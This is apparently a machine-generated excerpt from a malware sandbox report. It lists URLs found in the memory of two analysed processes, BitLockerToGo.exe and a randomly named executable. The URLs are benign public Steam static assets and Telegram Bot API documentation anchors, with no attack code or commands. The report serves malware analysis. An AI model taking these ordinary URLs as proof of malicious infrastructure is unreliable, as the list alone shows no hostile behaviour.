            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=83YueuslRxGq&amp;l=e
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&amp;l=en
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D21C9000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#Chatshared
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#approvechatjoinrequest
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#backgroundfill
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691422577.000001E7D2F6E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#backgroundfillfreeformgradient
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922174463.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#backgroundfillgradient
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#backgroundfillsolid
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#backgroundtype
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#backgroundtypechattheme
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691422577.000001E7D2F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#backgroundtypefill
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#backgroundtypepattern
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#backgroundtypewallpaper
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#birthdate
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#botcommand
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D21C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#botcommandscopechatmember
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#botdescription
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#botname
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#botshortdescription
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#businessconnection
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689941950.000001E7D22A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#businessintro
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#businesslocation
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D2194000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#businessmessagesdeleted
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D21C9000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#businessopeninghours
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#businessopeninghoursinterval
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D21C9000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#chatadministratorrights
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#chatbackground
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#chatboost
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#chatboostadded
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#chatboostremoved
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#chatboostsource
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#chatboostsourcegiftcode
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691422577.000001E7D2F6E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#chatboostsourcegiveaway
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#chatboostsourcepremium
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#chatboostupdated
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D2194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#closeforumtopic
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#closegeneralforumtopic
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#declinechatjoinrequest
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#deletechatphoto
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D2194000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#deleteforumtopic
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#editmessagelivelocation
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#editmessagemedia
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#editmessagetext
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#externalreplyinfo
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#forumtopic
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#forumtopicclosed
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#forumtopiccreated
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#forumtopicedited
